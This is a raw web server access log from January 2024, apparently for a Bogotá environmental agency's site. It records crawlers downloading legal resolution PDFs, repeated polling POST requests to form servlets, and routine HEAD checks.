201.245.192.253 - - [14/Jan/2024:06:05:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
201.245.192.253 - - [14/Jan/2024:06:06:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:06:07:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:06:08:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [14/Jan/2024:06:09:13 -0500] "GET /BLA/resoluciones/AUTOS%202014/5792.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/Jan/2024:06:09:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:06:10:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [14/Jan/2024:06:10:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:06:10:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
172.22.2.4 - - [14/Jan/2024:06:09:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [14/Jan/2024:06:11:18 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [14/Jan/2024:06:11:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:06:10:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60996
201.245.192.253 - - [14/Jan/2024:06:12:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
117.152.74.187 - - [14/Jan/2024:06:13:31 -0500] "GET /BLA/boletinlegal/Directivas/2012/Directiva%20No.%201%20del%2030%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 1522771
172.22.2.4 - - [14/Jan/2024:06:12:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
201.245.192.253 - - [14/Jan/2024:06:13:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:06:14:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:06:14:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38701
201.245.192.253 - - [14/Jan/2024:06:14:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39286
113.99.177.195 - - [14/Jan/2024:06:14:53 -0500] "GET /BLA/boletinlegal/Directivas/2012/Directiva%20No.%201%20del%2030%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 1522771
201.245.192.253 - - [14/Jan/2024:06:15:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [14/Jan/2024:06:15:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:06:15:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
201.245.192.253 - - [14/Jan/2024:06:16:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:06:15:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/Jan/2024:06:15:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
201.245.192.253 - - [14/Jan/2024:06:17:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:06:18:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:06:18:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38701
201.245.192.253 - - [14/Jan/2024:06:19:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39286
201.245.192.253 - - [14/Jan/2024:06:19:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:06:19:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
201.245.192.253 - - [14/Jan/2024:06:20:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [14/Jan/2024:06:20:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:06:20:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
201.245.192.253 - - [14/Jan/2024:06:21:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:06:22:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:06:20:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.87.10 - - [14/Jan/2024:06:23:18 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
172.22.2.4 - - [14/Jan/2024:06:21:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
201.245.192.253 - - [14/Jan/2024:06:23:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
173.252.107.8 - - [14/Jan/2024:06:24:13 -0500] "GET /bogota-ya-cuenta-mas-de-70-negocios-verdes-verificados.html HTTP/1.1" 200 992
201.245.192.253 - - [14/Jan/2024:06:24:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [14/Jan/2024:06:24:33 -0500] "GET /BLA/resoluciones/AUTOS%202009/2587.pdf HTTP/1.1" 200 86907
201.245.192.253 - - [14/Jan/2024:06:24:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38701
201.245.192.253 - - [14/Jan/2024:06:24:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39286
216.244.66.195 - - [14/Jan/2024:06:24:43 -0500] "GET /BLA/resoluciones/AUTOS%202014/1000.pdf HTTP/1.1" 200 174977
216.244.66.195 - - [14/Jan/2024:06:25:05 -0500] "GET /BLA/resoluciones/AUTOS%202014/1267.pdf HTTP/1.1" 200 421992
216.244.66.195 - - [14/Jan/2024:06:25:22 -0500] "GET /BLA/resoluciones/AUTOS%202014/2481.pdf HTTP/1.1" 200 358445
201.245.192.253 - - [14/Jan/2024:06:25:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [14/Jan/2024:06:25:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:06:25:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.244.66.195 - - [14/Jan/2024:06:26:00 -0500] "GET /BLA/resoluciones/AUTOS%202022/3094.pdf HTTP/1.1" 200 459155
207.46.13.126 - - [14/Jan/2024:06:26:03 -0500] "GET /Publicaciones/2023EE232169.pdf HTTP/1.1" 404 228
201.245.192.253 - - [14/Jan/2024:06:26:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:26:41 -0500] "GET /BLA/resoluciones/AUTOS%202022/3162.pdf HTTP/1.1" 200 382460
216.244.66.195 - - [14/Jan/2024:06:27:14 -0500] "GET /BLA/resoluciones/AUTOS%202022/3679.pdf HTTP/1.1" 200 423805
66.249.66.12 - - [14/Jan/2024:06:27:24 -0500] "GET /resoluciones/RESOLUCIONES%202008/2514.pdf HTTP/1.1" 404 1018
172.22.2.4 - - [14/Jan/2024:06:27:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [14/Jan/2024:06:27:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:27:44 -0500] "GET /BLA/resoluciones/AUTOS%202022/4065.pdf HTTP/1.1" 200 352205
216.244.66.195 - - [14/Jan/2024:06:28:16 -0500] "GET /BLA/resoluciones/AUTOS%202022/4069.pdf HTTP/1.1" 200 396494
201.245.192.253 - - [14/Jan/2024:06:28:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [14/Jan/2024:06:26:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [14/Jan/2024:06:28:46 -0500] "GET /BLA/resoluciones/AUTOS%202022/4075.pdf HTTP/1.1" 200 436739
201.245.192.253 - - [14/Jan/2024:06:28:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38701
216.244.66.195 - - [14/Jan/2024:06:29:13 -0500] "GET /BLA/resoluciones/AUTOS%202022/4092.pdf HTTP/1.1" 200 389949
172.22.2.4 - - [14/Jan/2024:06:27:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
201.245.192.253 - - [14/Jan/2024:06:29:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39286
216.244.66.195 - - [14/Jan/2024:06:29:39 -0500] "GET /BLA/resoluciones/AUTOS%202022/4868.pdf HTTP/1.1" 200 383118
201.245.192.253 - - [14/Jan/2024:06:29:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:30:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0049.pdf HTTP/1.1" 200 370268
201.245.192.253 - - [14/Jan/2024:06:30:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:30:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0303.pdf HTTP/1.1" 200 70023
216.245.221.92 - - [14/Jan/2024:06:30:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:06:30:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.244.66.195 - - [14/Jan/2024:06:30:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0432.pdf HTTP/1.1" 200 70969
216.244.66.195 - - [14/Jan/2024:06:31:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0498.pdf HTTP/1.1" 200 83059
216.244.66.195 - - [14/Jan/2024:06:31:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0555.pdf HTTP/1.1" 200 86049
201.245.192.253 - - [14/Jan/2024:06:31:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:31:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0792.pdf HTTP/1.1" 200 277845
216.244.66.195 - - [14/Jan/2024:06:32:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0906.pdf HTTP/1.1" 200 63979
201.245.192.253 - - [14/Jan/2024:06:32:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:32:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/0963.pdf HTTP/1.1" 200 72899
216.244.66.195 - - [14/Jan/2024:06:32:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1071.pdf HTTP/1.1" 200 387488
66.249.79.75 - - [14/Jan/2024:06:33:00 -0500] "GET /portaldeninos/2021/06/20/mas-de-130-arboles-fueron-plantados-en-el-humedal-la-conejera-con-comunidad-educativa/ HTTP/1.1" 200 107808
66.249.79.76 - - [14/Jan/2024:06:33:06 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
66.249.79.76 - - [14/Jan/2024:06:33:09 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
216.244.66.195 - - [14/Jan/2024:06:33:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1164.pdf HTTP/1.1" 200 268654
207.46.13.92 - - [14/Jan/2024:06:33:13 -0500] "GET /portaldeninos/agua-y-estructura-ecologica-principal/ HTTP/1.1" 200 87488
216.244.66.195 - - [14/Jan/2024:06:33:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1286.pdf HTTP/1.1" 200 348163
216.244.66.195 - - [14/Jan/2024:06:33:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1552.pdf HTTP/1.1" 200 77991
201.245.192.253 - - [14/Jan/2024:06:33:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:33:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1922.pdf HTTP/1.1" 200 307198
207.46.13.92 - - [14/Jan/2024:06:34:01 -0500] "GET /portaldeninos/aula-ambiental-artistica-itinerante-auambari/ HTTP/1.1" 200 89306
216.244.66.195 - - [14/Jan/2024:06:34:07 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202010/&sort=size&order=asc HTTP/1.1" 200 281848
172.22.2.4 - - [14/Jan/2024:06:32:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [14/Jan/2024:06:34:19 -0500] "GET /BLA/resoluciones/AUTOS%202007/0974.pdf HTTP/1.1" 200 184480
201.245.192.253 - - [14/Jan/2024:06:34:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:34:29 -0500] "GET /BLA/resoluciones/AUTOS%202008/0221.pdf HTTP/1.1" 200 107126
216.244.66.195 - - [14/Jan/2024:06:34:37 -0500] "GET /BLA/resoluciones/AUTOS%202008/0489.pdf HTTP/1.1" 200 74155
201.245.192.253 - - [14/Jan/2024:06:34:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38701
201.245.192.253 - - [14/Jan/2024:06:34:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39286
172.22.2.4 - - [14/Jan/2024:06:34:44 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9648
216.244.66.195 - - [14/Jan/2024:06:34:45 -0500] "GET /BLA/resoluciones/AUTOS%202008/0586.pdf HTTP/1.1" 200 39333
216.244.66.195 - - [14/Jan/2024:06:34:51 -0500] "GET /BLA/resoluciones/AUTOS%202008/1726.pdf HTTP/1.1" 200 102339
216.244.66.195 - - [14/Jan/2024:06:34:58 -0500] "GET /BLA/resoluciones/AUTOS%202009/0646.pdf HTTP/1.1" 200 100572
216.244.66.195 - - [14/Jan/2024:06:35:04 -0500] "GET /BLA/resoluciones/AUTOS%202009/0649.pdf HTTP/1.1" 200 127916
216.244.66.195 - - [14/Jan/2024:06:35:09 -0500] "GET /BLA/resoluciones/AUTOS%202013/0244.pdf HTTP/1.1" 200 1858482
172.22.2.4 - - [14/Jan/2024:06:33:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58666
66.249.66.14 - - [14/Jan/2024:06:35:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5213.pdf HTTP/1.1" 200 941378
201.245.192.253 - - [14/Jan/2024:06:35:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [14/Jan/2024:06:35:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:06:35:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.244.66.195 - - [14/Jan/2024:06:35:53 -0500] "GET /BLA/resoluciones/AUTOS%202013/0441.pdf HTTP/1.1" 200 2049761
201.245.192.253 - - [14/Jan/2024:06:36:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:36:28 -0500] "GET /BLA/resoluciones/AUTOS%202013/1004.pdf HTTP/1.1" 200 2299143
52.167.144.67 - - [14/Jan/2024:06:36:34 -0500] "GET /robots.txt HTTP/1.1" 404 1049
52.167.144.174 - - [14/Jan/2024:06:36:42 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20C-245%20DE%202004.doc HTTP/1.1" 304 -
216.244.66.195 - - [14/Jan/2024:06:37:01 -0500] "GET /BLA/resoluciones/AUTOS%202013/1361.pdf HTTP/1.1" 200 1917099
66.249.66.12 - - [14/Jan/2024:06:37:29 -0500] "GET /resoluciones/RESOLUCIONES%202009/6916.pdf HTTP/1.1" 404 1018
216.244.66.195 - - [14/Jan/2024:06:37:32 -0500] "GET /BLA/resoluciones/AUTOS%202013/2722.pdf HTTP/1.1" 200 914524
201.245.192.253 - - [14/Jan/2024:06:37:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:38:04 -0500] "GET /BLA/resoluciones/AUTOS%202013/2731.pdf HTTP/1.1" 200 838080
201.245.192.253 - - [14/Jan/2024:06:38:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:38:34 -0500] "GET /BLA/resoluciones/AUTOS%202013/2814.pdf HTTP/1.1" 200 676896
201.245.192.253 - - [14/Jan/2024:06:38:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38701
216.244.66.195 - - [14/Jan/2024:06:39:02 -0500] "GET /BLA/resoluciones/AUTOS%202014/0453.pdf HTTP/1.1" 200 607211
66.249.66.12 - - [14/Jan/2024:06:39:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20301%20AL%20400/RESOLUCION%200328%20DE%202007.pdf HTTP/1.1" 200 485487
216.244.66.195 - - [14/Jan/2024:06:39:28 -0500] "GET /BLA/resoluciones/AUTOS%202014/0454.pdf HTTP/1.1" 200 562783
201.245.192.253 - - [14/Jan/2024:06:39:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39286
201.245.192.253 - - [14/Jan/2024:06:39:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:39:56 -0500] "GET /BLA/resoluciones/AUTOS%202014/0501.pdf HTTP/1.1" 200 588991
172.22.2.4 - - [14/Jan/2024:06:38:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:06:40:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:40:35 -0500] "GET /BLA/resoluciones/AUTOS%202014/1148.pdf HTTP/1.1" 200 1051887
216.245.221.92 - - [14/Jan/2024:06:40:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Jan/2024:06:40:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
172.22.2.4 - - [14/Jan/2024:06:39:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60529
213.186.1.154 - - [14/Jan/2024:06:41:06 -0500] "GET /images/Caminatas%20%281%29%20%282%29.jpeg HTTP/1.1" 200 81411
216.244.66.195 - - [14/Jan/2024:06:41:07 -0500] "GET /BLA/resoluciones/AUTOS%202014/1225.pdf HTTP/1.1" 200 1159814
216.244.66.195 - - [14/Jan/2024:06:41:38 -0500] "GET /BLA/resoluciones/AUTOS%202014/1932.pdf HTTP/1.1" 200 746795
201.245.192.253 - - [14/Jan/2024:06:41:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:42:08 -0500] "GET /BLA/resoluciones/AUTOS%202014/2893.pdf HTTP/1.1" 200 514653
201.245.192.253 - - [14/Jan/2024:06:42:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:42:36 -0500] "GET /BLA/resoluciones/AUTOS%202014/2912.pdf HTTP/1.1" 200 660711
216.244.66.195 - - [14/Jan/2024:06:43:03 -0500] "GET /BLA/resoluciones/AUTOS%202015/0445.pdf HTTP/1.1" 200 704175
216.244.66.195 - - [14/Jan/2024:06:43:29 -0500] "GET /BLA/resoluciones/AUTOS%202015/0474.pdf HTTP/1.1" 200 627229
201.245.192.253 - - [14/Jan/2024:06:43:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:43:54 -0500] "GET /BLA/resoluciones/AUTOS%202015/0835.pdf HTTP/1.1" 200 2077079
201.245.192.253 - - [14/Jan/2024:06:44:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:44:35 -0500] "GET /BLA/resoluciones/AUTOS%202015/1617.pdf HTTP/1.1" 200 600206
173.252.95.117 - - [14/Jan/2024:06:44:47 -0500] "GET /images/Caminatas%20(1)%20(2).jpeg HTTP/1.1" 200 81411
216.244.66.195 - - [14/Jan/2024:06:45:05 -0500] "GET /BLA/resoluciones/AUTOS%202015/1903.pdf HTTP/1.1" 200 1415231
66.249.66.12 - - [14/Jan/2024:06:45:18 -0500] "GET /resoluciones/RESOLUCIONES%202009/1330.pdf HTTP/1.1" 404 1018
2.136.74.115 - - [14/Jan/2024:06:45:24 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [14/Jan/2024:06:45:36 -0500] "GET /BLA/resoluciones/AUTOS%202015/2549.pdf HTTP/1.1" 200 642375
201.245.192.253 - - [14/Jan/2024:06:45:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [14/Jan/2024:06:45:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39439
216.245.221.92 - - [14/Jan/2024:06:45:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/Jan/2024:06:44:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [14/Jan/2024:06:46:05 -0500] "GET /BLA/resoluciones/AUTOS%202015/2814.pdf HTTP/1.1" 200 780170
201.245.192.253 - - [14/Jan/2024:06:46:24 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6daf3d1e69b9448f9b338854e2531f358.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:46:35 -0500] "GET /BLA/resoluciones/AUTOS%202015/3336.pdf HTTP/1.1" 200 618928
172.22.2.4 - - [14/Jan/2024:06:45:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60529
216.244.66.195 - - [14/Jan/2024:06:47:04 -0500] "GET /BLA/resoluciones/AUTOS%202015/3407.pdf HTTP/1.1" 200 930139
66.249.66.13 - - [14/Jan/2024:06:47:05 -0500] "GET /Publicaciones/2022EE140527.pdf HTTP/1.1" 404 228
69.171.231.1 - - [14/Jan/2024:06:47:29 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
216.244.66.195 - - [14/Jan/2024:06:47:30 -0500] "GET /BLA/resoluciones/AUTOS%202015/3581.pdf HTTP/1.1" 200 621709
201.245.192.253 - - [14/Jan/2024:06:47:43 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6e9245d4a5ae64507bcdc86473ff87750.e3iSbxaKaheRe34Rb3eTbx8LaNb0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [14/Jan/2024:06:47:54 -0500] "GET /BLA/resoluciones/AUTOS%202015/3646.pdf HTTP/1.1" 200 780694
216.244.66.195 - - [14/Jan/2024:06:48:20 -0500] "GET /BLA/resoluciones/AUTOS%202018/0232.pdf HTTP/1.1" 200 284744
